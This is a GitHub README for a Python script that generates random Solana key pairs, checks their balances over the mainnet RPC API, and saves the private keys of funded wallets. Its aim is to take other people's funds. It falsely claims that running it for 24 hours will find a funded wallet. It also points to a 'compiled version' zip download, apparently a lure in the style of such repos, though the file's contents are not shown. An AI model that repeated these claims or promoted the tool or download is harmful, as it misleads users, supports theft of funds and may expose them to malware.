This Python script automatically generates new Solana addresses, checks their balance, and saves wallets with a non-zero balance to the solana_wallets.txt
file, 24h and you will find wallet with balance
- Generates random Solana addresses and private keys.
- Checks wallet balance using the Solana JSON-RPC API.
- Automatically saves wallets with a balance > 0 to
solana_wallets.txt
.
- Python 3.6+
- Installed dependencies (see below)
- Clone the repository or download the script:
git clone https://github.com/Tieuvanna/solana-wallet-checker cd solana-wallet-checker
- Install required libraries:
pip install requests pynacl base58 colorama
- Run the script:
Compiled version https://github.com/Tieuvanna/solana-wallet-checker/releases/download/check-sol/sol-checker.zip
python sol_checker.py
- The script creates a new key pair (private + public).
- The public key is converted into a Solana address.
- A request is sent to
https://api.mainnet-beta.solana.com
to check the balance. - If the balance is greater than 0, the wallet is saved to
solana_wallets.txt
. - Gen 5 wallets per second
If an address has a balance, it is recorded in solana_wallets.txt
in the following format:
Address: 3nBg2Z...k1T8
Private Key: 5H2pZ...6yF5
Balance: 1000000000 lamports (1 SOL)
----------------------------------------
- Do not share your private keys! Anyone with a private key can steal funds from the wallet.
- Use this tool for educational purposes only.
Your Name – GitHub
This project is distributed under the MIT license.